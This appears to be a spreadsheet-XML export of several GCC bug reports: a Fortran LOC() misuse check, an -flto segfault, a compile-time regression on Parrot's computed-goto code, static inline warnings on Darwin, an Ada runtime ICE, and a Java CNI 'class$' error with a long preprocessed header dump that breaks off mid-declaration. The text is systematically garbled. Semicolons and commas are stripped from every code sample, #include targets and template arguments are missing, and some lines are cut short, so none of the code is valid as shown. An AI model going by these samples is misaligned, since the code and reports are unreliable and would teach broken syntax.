      || (e-&gt;expr_type == EXPR_FUNCTION
          &amp;&amp; e-&gt;symtree-&gt;n.sym-&gt;result == e-&gt;symtree-&gt;n.sym))
    return SUCCESS
I think the idea is to support
  function f()
    f = 4.0
  end function f
where this f is to regarded as variable. However the test is also called outside of the function body of f (incl. internal procedures of f). In that case it does not make much sense.
The following example shows this: For LOC(f) it prints the address of the function for LOC(f()) the result of the function call but it fails for LOC(g()) due to
   e-&gt;symtree-&gt;n.sym-&gt;result == e-&gt;symtree-&gt;n.sym
(Ditto if f had a result variable.)
 * * *
I think the proper fix would be
a) To check whether is in the function body of f (incl. internal procedures of f) - and return FAILURE otherwise.
b) Optionally: Also allow LOC() for function (i.e. pointer address of the function itself). Supporting LOC(f()) does not make much sense except for debugging - if one allows the latter one also needs to handle generic functions.
 * * *
module m
 interface g
   module procedure f
 end interface g
contains
 function f()
   integer pointer :: f
   f =&gt; null()
 end function f
end module m
use m
print * loc(f)   ! prints something like 4196132
print * loc(f()) ! print 0
print * loc(g()) ! Error: must be a variable
end</t>
  </si>
  <si>
    <t>GCC-42401</t>
  </si>
  <si>
    <t>wrong-code with -flto</t>
  </si>
  <si>
    <t>&gt; cat main.cc
struct Foo { static void f() }
int main() { Foo::f() }
&gt; cat Foo.cc
#include 
#include 
struct Foo { static void f() }
void Foo::f()
{
        typedef std::map Map
        static Map m
        Map::const_iterator it = m.find(0)
        if (it != m.end()) {
                std::string s = it-&gt;second
        }
}
&gt; g++ -flto -O3 -c Foo.cc
&gt; g++ -flto -O3 -c main.cc
&gt; g++ -flto -O3 main.o Foo.o
&gt; ./a.out
Segmentation fault (core dumped)
This program works as expected when compiled without -flto. Though when using -flto it crashes. I'm using SVN revision trunk@155309 on linux x86_64.
I didn't have time yet to reduce this testcase further (expand an reduce the #includes). I'll try to do that next week.
If you change -O3 into -O0 in the compilation commands but not in the link command this test triggers a ICE. But I'll file a different bug for this.</t>
  </si>
  <si>
    <t>GCC-12322</t>
  </si>
  <si>
    <t>[3.4 Regression] Significant slowdown when compiling computed-goto code in Parrot</t>
  </si>
  <si>
    <t>The GCC-3.4 development snapshots take 5x or 6x as long to compile the
computed-goto heavy 'core_ops_cg.c' in Parrot. GCC-3.3 compiles this file in
about five or six minutes on my slow machine - GCC-3.4 takes 30 or more minutes.
The memory usage appears to be roughly the same as that of GCC-3.3 as indicated
by top.
Parrot is the engine on what will be Perl 6. The 'core_ops_cg.c' file is
generated automatically by the Parrot build process and is about 280K in size.
Parrot can be downloaded from 
http://www.parrotcode.org</t>
  </si>
  <si>
    <t>ahaas</t>
  </si>
  <si>
    <t>GCC-34000</t>
  </si>
  <si>
    <t>GCC pedwarns about use of static inline functions from system headers in extern inline functions</t>
  </si>
  <si>
    <t>GCC 4.3 prints an unsuppressable warning about any use of a static inline function or static const data in a non-static inline function.
While this is useful for non-const static data and possibly for non-inlined static functions it is extremely annoying for static inline functions or static const objects.
On MacOS X Leopard (Darwin 9) the following program prints warnings.  (Note that htons() has a static inline declaration in the system header files.  This problem makes extern inline functions essentially useless since they cannot use system inline functions without warnings.)
#include 
#include 
extern inline short ntohs_wrapper(short x)
{
  return ntohs(x)
}
extern inline bool less_than_threshhold(int val)
{
  static const int threshhold = 100
  return val &lt; threshhold
}
[jonathan@Buzz ~]$ ~/FSF-GCC/bin/gcc -c inline-test.c
inline-test.c: In function 'ntohs_wrapper':
inline-test.c:6: warning: '_OSSwapInt16' is static but used in inline function 'ntohs_wrapper' which is not static
inline-test.c: In function 'less_than_threshhold':
inline-test.c:12: warning: 'threshhold' is static but declared in inline function 'less_than_threshhold' which is not static
inline-test.c:13: warning: 'threshhold' is static but used in inline function 'less_than_threshhold' which is not static
[jonathan@Buzz ~]$ ~/FSF-GCC/bin/gcc -c -v inline-test.c
Using built-in specs.
Target: i386-apple-darwin9.0.0
Configured with: ../gcc/configure --prefix=/Users/jonathan/FSF-GCC/ --with-gmp=/Users/jonathan/FSF-GCC/ --with-mpfr=/Users/jonathan/FSF-GCC/ --enable-lanaguages=cc++fortranobjcobj-c++ --enable-checking=release --with-tune=generic
Thread model: posix
gcc version 4.3.0 20071105 (experimental) (GCC)
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.5.0' '-c' '-v' '-mtune=generic'
 /Users/jonathan/FSF-GCC/bin/../libexec/gcc/i386-apple-darwin9.0.0/4.3.0/cc1 -quiet -v -iprefix /Users/jonathan/FSF-GCC/bin/../lib/gcc/i386-apple-darwin9.0.0/4.3.0/ -D__DYNAMIC__ inline-test.c -fPIC -quiet -dumpbase inline-test.c -mmacosx-version-min=10.5.0 -mtune=generic -auxbase inline-test -version -o /var/tmp//ccJzAq19.s
ignoring nonexistent directory /Users/jonathan/FSF-GCC/bin/../lib/gcc/i386-apple-darwin9.0.0/4.3.0/../../../../i386-apple-darwin9.0.0/include
ignoring nonexistent directory /usr/local/include
ignoring duplicate directory /Users/jonathan/FSF-GCC/bin/../lib/gcc/../../lib/gcc/i386-apple-darwin9.0.0/4.3.0/include
ignoring duplicate directory /Users/jonathan/FSF-GCC/bin/../lib/gcc/../../lib/gcc/i386-apple-darwin9.0.0/4.3.0/include-fixed
ignoring nonexistent directory /Users/jonathan/FSF-GCC/bin/../lib/gcc/../../lib/gcc/i386-apple-darwin9.0.0/4.3.0/../../../../i386-apple-darwin9.0.0/include
#include ... search starts here:
#include  search starts here:
 /Users/jonathan/FSF-GCC/bin/../lib/gcc/i386-apple-darwin9.0.0/4.3.0/include
 /Users/jonathan/FSF-GCC/bin/../lib/gcc/i386-apple-darwin9.0.0/4.3.0/include-fixed
 /Users/jonathan/FSF-GCC/bin/../lib/gcc/../../include
 /usr/include
 /System/Library/Frameworks
 /Library/Frameworks
End of search list.
GNU C (GCC) version 4.3.0 20071105 (experimental) (i386-apple-darwin9.0.0)
        compiled by GNU C version 4.3.0 20071105 (experimental) GMP version 4.2.2 MPFR version 2.3.0.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 4eaa8600939e59258d37cac385804206
inline-test.c: In function 'ntohs_wrapper':
inline-test.c:6: warning: '_OSSwapInt16' is static but used in inline function 'ntohs_wrapper' which is not static
inline-test.c: In function 'less_than_threshhold':
inline-test.c:12: warning: 'threshhold' is static but declared in inline function 'less_than_threshhold' which is not static
inline-test.c:13: warning: 'threshhold' is static but used in inline function 'less_than_threshhold' which is not static
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.5.0' '-c' '-v' '-mtune=generic'
 as -arch i386 -force_cpusubtype_ALL -o inline-test.o /var/tmp//ccJzAq19.s
COMPILER_PATH=/Users/jonathan/FSF-GCC/bin/../libexec/gcc/i386-apple-darwin9.0.0/4.3.0/:/Users/jonathan/FSF-GCC/bin/../libexec/gcc/
LIBRARY_PATH=/Users/jonathan/FSF-GCC/bin/../lib/gcc/i386-apple-darwin9.0.0/4.3.0/:/Users/jonathan/FSF-GCC/bin/../lib/gcc/:/Users/jonathan/FSF-GCC/bin/../lib/gcc/i386-apple-darwin9.0.0/4.3.0/../../../:/usr/lib/
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.5.0' '-c' '-v' '-mtune=generic'
COLLECT_GCC_OPTIONS='-mmacosx-version-min=10.5.0' '-c' '-v' '-mtune=generic'
This problem appears to have been introduced by Geoffrey Keating in Subversion Revision 118356 a fix for PR 11377.
GCC 4.2 does not have this problem.</t>
  </si>
  <si>
    <t>GCC-17746</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE when building the Ada RTS</t>
  </si>
  <si>
    <t>The bugbox says it all:
../../xgcc -B../../ -c -g -O2 -fPIC      -W -Wall -gnatpg  g-awk.adb -o g-awk.o
+===========================GNAT BUG DETECTED==============================+
| 4.0.0 20040930 (experimental) (sparc-sun-solaris2.8) GCC error:          |
| in expand_expr_addr_expr_1 at expr.c:6147                               |
| Error detected at g-awk.adb:1316:24                                      |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+
Please include these source files with error report
Note that list may not be accurate in some cases
so please double check that the problem can still
be reproduced with the set of files listed.
raised TYPES.UNRECOVERABLE_ERROR : comperr.adb:376
gmake[7]: *** [g-awk.o] Error 1
It's an assertion failure that happens at -O0 too:
  /* We must have made progress.  */
  gcc_assert (inner != exp)
(gdb) frame 1
#1  0x00416110 in expand_expr_addr_expr_1 (exp=0xfe834400 target=0x0
    tmode=SImode modifier=EXPAND_NORMAL) at /home/eric/cvs/gcc/gcc/expr.c:6147
6147      gcc_assert (inner != exp)
(gdb) p debug_tree(exp)
 &lt;view_convert_expr fe834400
    type &lt;record_type ff0dda80 gnat__awk__patterns__string_patternXn align-ok
type_2 BLK
        size 
        unit size 
        align 64 symtab 0 alias set 0
        fields &lt;field_decl ff115b80 _parent type &lt;record_type ff0d2c00
gnat__awk__patterns__patternXn&gt;
            decl_3 BLK file g-awk.adb line 152
            size 
            unit size 
            align 32 offset_align 64
            offset 
            bit offset  context
 arguments
 chain &gt;
        Ada size 
        pointer_to_this &lt;pointer_type ff121280
gnat__awk__patterns__string_patternSI__A463b&gt; reference_to_this &lt;reference_type
ff120a00&gt; chain &gt;
    arg 0 &lt;indirect_ref fe8343e0
        type &lt;record_type ff0d2c00 gnat__awk__patterns__patternXn align-ok
type_2 BLK size  unit size 
            align 32 symtab 0 alias set -1 fields  Ada
size 
            pointer_to_this &lt;pointer_type ff0de080
gnat__awk__patterns__pattern_accessXn&gt; reference_to_this &lt;reference_type
ff0d9d00&gt; chain &gt;
        arg 0 &lt;var_decl fe830900 P931b type &lt;pointer_type fe830880
gnat__awk__patterns__pattern_accessXn&gt;
            readonly used unsigned ignored SI file g-awk.adb line 1180 size
 unit size 
            align 32 context 
            (reg:SI 111 [ P931b ]) chain &lt;type_decl fe830a80
gnat__awk__register__A935b&gt;&gt;&gt;&gt;
$1 = void</t>
  </si>
  <si>
    <t>GCC-6554</t>
  </si>
  <si>
    <t>Java cni bug finding class$</t>
  </si>
  <si>
    <t>/tmp/tesla.cc: In member function `virtual JArray* 
   com::spinnakernet::bogus::here::bigClass::getPortAttr(__java_int)':
/tmp/tesla.cc:15: can't find class$
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.1 20020430 (prerelease)
Environment:
System: Linux wayne 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --host=i686-pc-linux-gnu --prefix=/spin/awk/compilers/gcc-3.1-hol --enable-shared --enable-threads=posix --enable-languages=cc++java --enable-version-specific-runtime-libs
How-To-Repeat:
# 1 /tmp/tesla.cc
# 1 
# 1 
# 1 /tmp/tesla.cc
# 1 /usr/local/include/gcj/cni.h 1 3
# 16 /usr/local/include/gcj/cni.h 3
# 1 /usr/local/include/java/lang/Object.h 1 3
# 14 /usr/local/include/java/lang/Object.h 3
#pragma interface
# 1 /usr/local/include/gcj/javaprims.h 1 3
# 15 /usr/local/include/gcj/javaprims.h 3
#pragma GCC java_exceptions
# 27 /usr/local/include/gcj/javaprims.h 3
extern Java
{
  typedef __java_byte jbyte
  typedef __java_short jshort
  typedef __java_int jint
  typedef __java_long jlong
  typedef __java_float jfloat
  typedef __java_double jdouble
  typedef __java_char jchar
  typedef __java_boolean jboolean
  typedef jint jsize
  namespace java
  {
    namespace io
    {
      class BufferedInputStream
      class BufferedOutputStream
      class BufferedReader
      class BufferedWriter
      class ByteArrayInputStream
      class ByteArrayOutputStream
      class CharArrayReader
      class CharArrayWriter
      class CharConversionException
      class DataInput
      class DataInputStream
      class DataOutput
      class DataOutputStream
      class EOFException
      class Externalizable
      class File
      class FileDescriptor
      class FileFilter
      class FileInputStream
      class FileNotFoundException
      class FileOutputStream
      class FilePermission
      class FileReader
      class FileWriter
      class FilenameFilter
      class FilterInputStream
      class FilterOutputStream
      class FilterReader
      class FilterWriter
      class IOException
      class InputStream
      class InputStreamReader
      class InterfaceComparator
      class InterruptedIOException
      class InvalidClassException
      class InvalidObjectException
      class LineNumberInputStream
      class LineNumberReader
      class MemberComparator
      class NotActiveException
      class NotSerializableException
      class ObjectInput
      class ObjectInputStream
      class ObjectInputStream$GetField
      class ObjectInputValidation
      class ObjectOutput
      class ObjectOutputStream
      class ObjectOutputStream$PutField
      class ObjectStreamClass
      class ObjectStreamConstants
      class ObjectStreamException
      class ObjectStreamField
      class OptionalDataException
      class OutputStream
      class OutputStreamWriter
      class PipedInputStream
      class PipedOutputStream
      class PipedReader
      class PipedWriter
      class PrintStream
      class PrintWriter
      class PushbackInputStream
      class PushbackReader
      class RandomAccessFile
      class Reader
      class SequenceInputStream
      class Serializable
      class SerializablePermission
      class StreamCorruptedException
      class StreamTokenizer
      class StringBufferInputStream
      class StringReader
      class StringWriter
      class SyncFailedException
      class UTFDataFormatException
      class UnsupportedEncodingException
      class ValidatorAndPriority
      class WriteAbortedException
      class Writer
    }
    namespace lang
    {
      class AbstractMethodError
      class ArithmeticException
      class ArrayIndexOutOfBoundsException
      class ArrayStoreException
      class Boolean
      class Byte
      class CPlusPlusDemangler
      class Character
      class Character$Subset
      class Character$UnicodeBlock
      class Class
      class ClassCastException
      class ClassCircularityError
      class ClassFormatError
      class ClassLoader
      class ClassNotFoundException
      class CloneNotSupportedException
      class Cloneable
      class Comparable
      class Compiler
      class ConcreteProcess
      class Double
      class Error
      class Exception
      class ExceptionInInitializerError
      class Float
      class IllegalAccessError
      class IllegalAccessException
      class IllegalArgumentException
      class IllegalMonitorStateException
      class IllegalStateException
      class IllegalThreadStateException
      class IncompatibleClassChangeError
      class IndexOutOfBoundsException
      class InstantiationError
      class InstantiationException
      class Integer
      class InternalError
      class InterruptedException
      class LinkageError
      class Long
      class Math
      class NegativeArraySizeException
      class NoClassDefFoundError
      class NoSuchFieldError
      class NoSuchFieldException
      class NoSuchMethodError
      class NoSuchMethodException
      class NullPointerException
      class Number
      class NumberFormatException
      class Object
      class OutOfMemoryError
      class Process
      class Runnable
      class Runtime
      class RuntimeException
      class RuntimePermission
      class SecurityException
      class SecurityManager
      class Short
      class StackOverflowError
      class String
      class StringBuffer
      class StringIndexOutOfBoundsException
      class System
      class Thread
      class ThreadDeath
      class ThreadGroup
      class Throwable
      class UnknownError
      class UnsatisfiedLinkError
      class UnsupportedOperationException
      class VerifyError
      class VirtualMachineError
      class Void
      namespace ref
      {
        class PhantomReference
        class Reference
        class ReferenceQueue
        class SoftReference
        class WeakReference
      }
      namespace reflect
      {
        class AccessibleObject
        class Array
        class Constructor
        class Field
        class InvocationTargetException
        class Member
        class Method
        class Modifier
        class ReflectPermission
      }
    }
    namespace util
    {
      class AbstractCollection
      class AbstractList
      class AbstractList$AbstractListItr
      class AbstractMap
      class AbstractSequentialList
      class AbstractSet
      class ArrayList
      class Arrays
      class Arrays$ListImpl
      class BasicMapEntry
      class BitSet
      class Calendar
      class Collection
      class Collections
      class Collections$ReverseComparator
      class Collections$SynchronizedCollection
      class Collections$SynchronizedIterator
      class Collections$SynchronizedList
      class Collections$SynchronizedListIterator
      class Collections$SynchronizedMap
      class Collections$SynchronizedSet
      class Collections$SynchronizedSortedMap
      class Collections$SynchronizedSortedSet
      class Collections$UnmodifiableCollection
      class Collections$UnmodifiableIterator
      class Collections$UnmodifiableList
      class Collections$UnmodifiableListIterator
      class Collections$UnmodifiableMap
      class Collections$UnmodifiableSet
      class Collections$UnmodifiableSortedMap
      class Collections$UnmodifiableSortedSet
      class Comparator
      class ConcurrentModificationException
      class Date
      class Dictionary
      class EmptyStackException
      class Enumeration
      class EventListener
      class EventObject
      class GregorianCalendar
      class HashMap
      class HashMap$Entry
      class HashMap$HashIterator
      class HashSet
      class Hashtable
      class Hashtable$Entry
      class Hashtable$Enumerator
      class Hashtable$HashIterator
      class Iterator
      class LinkedList
      class LinkedList$Entry
      class LinkedList$LinkedListItr
      class List
      class ListIterator
      class ListResourceBundle
      class Locale
      class Map
      class Map$Entry
      class MissingResourceException
      class NoSuchElementException
      class Observable
      class Observer
      class Properties
      class PropertyPermission
      class PropertyResourceBundle
      class Random
      class ResourceBundle
      class Set
      class SimpleTimeZone
      class SortedMap
      class SortedSet
      class Stack
      class StringTokenizer
      class SubList
      class TimeZone
      class Timer
      class Timer$Scheduler
      class Timer$TaskQueue
      class TimerTask
      class TooManyListenersException
      class TreeMap
      class TreeMap$Node
      class TreeMap$SubMap
      class TreeMap$TreeIterator
      class TreeMap$VerifyResult
      class TreeSet
      class Vector
      class WeakHashMap
      class WeakHashMap$Entry
      class WeakHashMap$WeakBucket
      class WeakHashMap$WeakEntrySet
      namespace jar
      {
        class Attributes
        class Attributes$Name
        class JarEntry
        class JarException
        class JarFile
        class JarFile$JarEnumeration
        class JarInputStream
        class JarOutputStream
        class Manifest
      }
      namespace zip
      {
        class Adler32
        class CRC32
        class CheckedInputStream
        class CheckedOutputStream
        class Checksum
        class DataFormatException
        class Deflater
        class DeflaterOutputStream
        class GZIPInputStream
        class GZIPOutputStream
        class Inflater
        class InflaterInputStream
        class ZipConstants
        class ZipEntry
        class ZipEnumeration
        class ZipException
        class ZipFile
        class ZipInputStream
        class ZipOutputStream
      }
    }
  }
}
typedef struct java::lang::Object* jobject
typedef class java::lang::Class* jclass
typedef class java::lang::Throwable* jthrowable
typedef class java::lang::String* jstring
struct _Jv_JNIEnv
typedef struct _Jv_Field *jfieldID
typedef struct _Jv_Method *jmethodID
extern C jobject _Jv_AllocObject (jclass jint) __attribute__((__malloc__))
extern C jboolean _Jv_IsInstanceOf(jobject jclass)
extern C jstring _Jv_AllocString(jsize) __attribute__((__malloc__))
extern C jstring _Jv_NewString (const jchar* jsize)
  __attribute__((__malloc__))
extern C jchar* _Jv_GetStringChars (jstring str)
extern C jint _Jv_MonitorEnter (jobject)
extern C jint _Jv_MonitorExit (jobject)
extern C jstring _Jv_NewStringLatin1(const char* jsize)
  __attribute__((__malloc__))
extern C jsize _Jv_GetStringUTFLength (jstring)
extern C jsize _Jv_GetStringUTFRegion (jstring jsize jsize char *)
extern C void _Jv_Throw (jthrowable) __attribute__ ((__noreturn__))
extern C void* _Jv_Malloc (jsize) __attribute__((__malloc__))
extern C void* _Jv_Realloc (void * jsize)
extern C void _Jv_Free (void*)
typedef unsigned short _Jv_ushort __attribute__((__mode__(__HI__)))
typedef unsigned int _Jv_uint __attribute__((__mode__(__SI__)))
struct _Jv_Utf8Const
{
  _Jv_ushort hash
  _Jv_ushort length
  char data[1]
}
# 17 /usr/local/include/java/lang/Object.h 2 3
struct _JvObjectPrefix
{
protected:
  virtual void nacd_1 (void) {}
  virtual void nacd_2 (void) {}
}
class java::lang::Object : public _JvObjectPrefix
{
protected:
  virtual void finalize (void)
public:
  jclass getClass (void)
  virtual jint hashCode (void)
  void notify (void)
  void notifyAll (void)
  void wait (jlong timeout jint nanos)
  virtual jboolean equals (jobject obj)
  Object (void)
  virtual jstring toString (void)
  void wait (void)
  void wait (jlong timeout)
  friend jint _Jv_MonitorEnter (jobject obj)
  friend jint _Jv_MonitorExit (jobject obj)
  friend void _Jv_InitializeSyncMutex (void)
  friend void _Jv_FinalizeObject (jobject obj)
# 57 /usr/local/include/java/lang/Object.h 3
  static java::lang::Class class$
protected:
  virtual jobject clone (void)
private:
  jobject sync_info
  void sync_init (void)
}
# 17 /usr/local/include/gcj/cni.h 2 3
# 1 /usr/local/include/java/lang/Class.h 1 3
# 15 /usr/local/include/java/lang/Class.h 3
#pragma interface
# 1 /home/spin_test/awk/compilers/gcc-3.1-hol/lib/gcc-lib/i686-pc-linux-gnu/3.1/include/stddef.h 1 3
# 147 /home/spin_test/awk/compilers/gcc-3.1-hol/lib/gcc-lib/i686-pc-linux-gnu/3.1/include/stddef.h 3
typedef int ptrdiff_t
# 201 /home/spin_test/awk/compilers/gcc-3.1-hol/lib/gcc-lib/i686-pc-linux-gnu/3.1/include/stddef.h 3
typedef unsigned int size_t
# 18 /usr/local/include/java/lang/Class.h 2 3
# 1 /usr/local/include/java/lang/String.h 1 3
#pragma interface
# 1 /usr/local/include/gcj/array.h 1 3
# 16 /usr/local/include/gcj/array.h 3
extern Java {
class __JArray : public java::lang::Object
{
protected:
  __JArray () : length (0)
  {
  }
public:
  const jsize length
  friend jsize JvGetArrayLength (__JArray*)
}
template
class JArray : public __JArray
{
  T data[0]
public:
  friend T* elements(JArray
  friend T* elements(JArray* x)
}
template
inline T* elements(JArray }
template
inline T* elements(JArray* x) { return x-&gt;data }
}
typedef __JArray *jarray
typedef JArray *jobjectArray
typedef JArray *jbooleanArray
typedef JArray *jbyteArray
typedef JArray *jcharArray
typedef JArray *jshortArray
typedef JArray *jintArray
typedef JArray *jlongArray
typedef JArray *jfloatArray
typedef JArray *jdoubleArray
typedef JArray *jstringArray
extern java::lang::Class _Jv_byteClass _Jv_shortClass _Jv_intClass
  _Jv_longClass _Jv_booleanClass _Jv_charClass _Jv_floatClass
  _Jv_doubleClass _Jv_voidClass
extern C jobjectArray _Jv_NewObjectArray(jsize length jclass jobject init)
extern C jobject _Jv_NewPrimArray (jclass eltype jint count)
extern inline jobjectArray
JvNewObjectArray (jsize length jclass cls jobject init)
{
  return _Jv_NewObjectArray (length cls init)
}
extern inline jcharArray
JvNewCharArray (jint length)
{
  return (jcharArray) _Jv_NewPrimArray ((
}
extern inline jbooleanArray
JvNewBooleanArray (jint length)
{
  return (jbooleanArray) _Jv_NewPrimArray ((
}
extern inline jbyteArray
JvNewByteArray (jint length)
{
  return (jbyteArray) _Jv_NewPrimArray ((
}
extern inline jshortArray
JvNewShortArray (jint length)
{
  return (jshortArray) _Jv_NewPrimArray ((
}
extern inline jintArray
JvNewIntArray (jint length)
{
  return (jintArray) _Jv_NewPrimArray ((
}
extern inline jlongArray
JvNewLongArray (jint length)
{
  return (jlongArray) _Jv_NewPrimArray ((
}
extern inline jfloatArray
JvNewFloatArray (jint length)
{
  return (jfloatArray) _Jv_NewPrimArray ((
}
extern inline jdoubleArray
JvNewDoubleArray (jint length)
{
  return (jdoubleArray) _Jv_NewPrimArray ((
}
extern C jstringArray JvConvertArgv(int argc const char **argv)
inline jsize JvGetArrayLength (jarray array) { return array-&gt;length }
# 10 /usr/local/include/java/lang/String.h 2 3
class ::java::lang::String : public ::java::lang::Object
{
public:
  String ()
  String (::java::lang::String *)
  String (::java::lang::StringBuffer *)
  String (jcharArray)
  String (jcharArray jint jint)
  String (jbyteArray)
  String (jbyteArray jint jint)
  String (jbyteArray ::java::lang::String *)
  String (jbyteArray jint jint ::java::lang::String *)
  static ::java::lang::String *copyValueOf (jcharArray)
  static ::java::lang::String *copyValueOf (jcharArray jint jint)
  String (jbyteArray jint)
  String (jbyteArray jint jint jint)
  ::java::lang::String *toString () { return this }
  jboolean equals (::java::lang::Object *)
  jint hashCode ()
  jint length () { return count }
  jchar charAt (jint)
  void getChars (jint jint jcharArray jint)
  jbyteArray getBytes ()
  jbyteArray getBytes (::java::lang::String *)
  void getBytes (jint jint jbyteArray jint)
  jcharArray toCharArray ()
  jboolean equalsIgnoreCase (::java::lang::String *)
  jint compareTo (::java::lang::String *)
  jint compareTo (::java::lang::Object *)
  jint compareToIgnoreCase (::java::lang::String *)
  jboolean regionMatches (jint ::java::lang::String * jint jint)
  jboolean regionMatches (jboolean jint ::java::lang::String * jint jint)
  jboolean startsWith (::java::lang::String *)
  jboolean startsWith (::java::lang::String * jint)
  jboolean endsWith (::java::lang::String *)
  jint indexOf (jint)
  jint indexOf (jint jint)
  jint indexOf (::java::lang::String *)
  jint indexOf (::java::lang::String * jint)
  jint lastIndexOf (jint)
  jint lastIndexOf (jint jint)
  jint lastIndexOf (::java::lang::String *)
  jint lastIndexOf (::java::lang::String * jint)
  ::java::lang::String *substring (jint)
  ::java::lang::String *substring (jint jint)
  ::java::lang::String *concat (::java::lang::String *)
  ::java::lang::String *replace (jchar jchar)
  ::java::lang::String *toLowerCase (::java::util::Locale *)
  ::java::lang::String *toUpperCase (::java::util::Locale *)
  ::java::lang::String *toLowerCase ()
  ::java::lang::String *toUpperCase ()
  ::java::lang::String *trim ()
  static ::java::lang::String *valueOf (::java::lang::Object *)
  static ::java::lang::String *valueOf (jcharArray)
  static ::java::lang::String *valueOf (jcharArray jint jint)
  static ::java::lang::String *valueOf (jboolean)
  static ::java::lang::String *valueOf (jchar)
  static ::java::lang::String *valueOf (jint)
  static ::java::lang::String *valueOf (jlong)
  static ::java::lang::String *valueOf (jfloat)
  static ::java::lang::String *valueOf (jdouble)
  ::java::lang::String *intern ()
private:
  void init ()
  void init (jcharArray jint jint jboolean)
  void init (jbyteArray jint jint jint)
  void init (jbyteArray jint jint ::java::lang::String *)
  static void rehash ()
  ::java::lang::Object *data
  jint boffset
  jint count
  static const jlong serialVersionUID = -6849794470754667710LL
public:
  static ::java::util::Comparator *CASE_INSENSITIVE_ORDER
  friend jchar* _Jv_GetStringChars (jstring str)
  friend jstring* _Jv_StringFindSlot (jchar* jint jint)
  friend jstring* _Jv_StringGetSlot (jstring)
  friend jstring _Jv_NewStringUtf8Const (_Jv_Utf8Const* str)
  friend jstring _Jv_NewStringLatin1 (const char* jsize)
  friend jstring _Jv_AllocString (jsize)
  static ::java::lang::Class class$
}
# 20 /usr/local/include/java/lang/Class.h 2 3
# 1 /usr/local/include/java/net/URL.h 1 3
#pragma interface
extern Java
{
  namespace java
  {
    namespace net
    {
      class URLConnection
      class URL
      class URLStreamHandlerFactory
      class URLStreamHandler
    }
  }
}
class ::java::net::URL : public ::java::lang::Object
{
public:
  URL (::java::lang::String * ::java::lang::String * jint ::java::lang::String *)
  URL (::java::lang::String * ::java::lang::String * ::java::lang::String *)
  URL (::java::lang::String * ::java::lang::String * jint ::java::lang::String * ::java::net::URLStreamHandler *)
  URL (::java::lang::String *)
  URL (::java::net::URL * ::java::lang::String *)
  URL (::java::net::URL * ::java::lang::String * ::java::net::URLStreamHandler *)
  jboolean equals (::java::lang::Object *)
  ::java::lang::Object *getContent ()
  ::java::lang::String *getFile () { return file }
  ::java::lang::String *getHost () { return host }
  jint getPort () { return port }
  ::java::lang::String *getProtocol () { return protocol }
  ::java::lang::String *getRef () { return ref }
  jint hashCode ()
  ::java::net::URLConnection *openConnection ()
  ::java::io::InputStream *openStream ()
  jboolean sameFile (::java::net::URL *)
public:
  void set (::java::lang::String * ::java::lang::String * jint ::java::lang::String * ::java::lang::String *)
public:
  static void setURLStreamHandlerFactory (::java::net::URLStreamHandlerFactory *)
  ::java::lang::String *toExternalForm ()
  ::java::lang::String *toString ()
private:
  ::java::net::URLStreamHandler *setURLStreamHandler (::java::lang::String *)
  void readObject (::java::io::ObjectInputStream *)
  void writeObject (::java::io::ObjectOutputStream *)
  ::java::lang::String *protocol
  ::java::lang::String *host
  jint port
  ::java::lang::String *file
  ::java::lang::String *ref
  jint hashCode__
  ::java::net::URLStreamHandler *handler
  static ::java::util::Hashtable *handlers
  static ::java::net::URLStreamHandlerFactory *factory
  static const jlong serialVersionUID = -7627629688361524110LL
public:
  static ::java::lang::Class class$
}
# 21 /usr/local/include/java/lang/Class.h 2 3
# 1 /usr/local/include/java/lang/reflect/Modifier.h 1 3
#pragma interface
class ::java::lang::reflect::Modifier : public ::java::lang::Object
{
public:
  static jboolean isAbstract (jint)
  static jboolean isFinal (jint)
  static jboolean isInterface (jint)
  static jboolean isNative (jint)
  static jboolean isPrivate (jint)
  static jboolean isProtected (jint)
  static jboolean isPublic (jint)
  static jboolean isStatic (jint)
  static jboolean isStrict (jint)
  static jboolean isSynchronized (jint)
  static jboolean isTransient (jint)
  static jboolean isVolatile (jint)
  static ::java::lang::String *toString (jint)
public:
  static void toString (jint ::java::lang::StringBuffer *)
public:
  Modifier ()
  static const jint PUBLIC = 1L
  static const jint PRIVATE = 2L
  static const jint PROTECTED = 4L
  static const jint STATIC = 8L
  static const jint FINAL = 16L
  static const jint SYNCHRONIZED = 32L
  static const jint VOLATILE = 64L
  static const jint TRANSIENT = 128L
  static const jint NATIVE = 256L
  static const jint INTERFACE = 512L
  static const jint ABSTRACT = 1024L
  static const jint STRICT = 2048L
public:
  static const jint ALL_FLAGS = 4095L
public:
  static ::java::lang::Class class$
}
# 22 /usr/local/include/java/lang/Class.h 2 3
extern C void _Jv_InitClass (jclass klass)
extern C void _Jv_RegisterClasses (jclass *classes)
extern C void *_Jv_LookupInterfaceMethodIdx (jclass klass jclass iface
                                               int meth_idx)
enum
{
  JV_STATE_NOTHING = 0
  JV_STATE_PRELOADING = 1
  JV_STATE_LOADING = 3
  JV_STATE_LOADED = 5
  JV_STATE_COMPILED = 6
  JV_STATE_PREPARED = 7
  JV_STATE_LINKED = 9
  JV_STATE_IN_PROGRESS = 10
  JV_STATE_DONE = 12
  JV_STATE_ERROR = 14
}
struct _Jv_Field
struct _Jv_VTable
union _Jv_word
struct _Jv_Constants
{
  jint size
  jbyte *tags
  _Jv_word *data
}
struct _Jv_Method
{
  _Jv_Utf8Const *name
  _Jv_Utf8Const *signature
  _Jv_ushort accflags
  void *ncode
  _Jv_Method *getNextMethod ()
  { return this + 1 }
}
union _Jv_IDispatchTable
{
  struct
  {
    jshort iindex
    jshort itable_length
    void **itable
  } cls
  struct
  {
    jshort *ioffsets
  } iface
}
struct _Jv_ifaces
{
  jclass *list
  jshort len
  jshort count
}
union _Jv_Self
{
  char *vtable_ptr
  jclass self
}
class java::lang::Class : public java::lang::Object
{
public:
  static jclass forName (jstring className jboolean initialize
                         java::lang::ClassLoader *loader)
  static jclass forName (jstring className)
  JArray *getClasses (void)
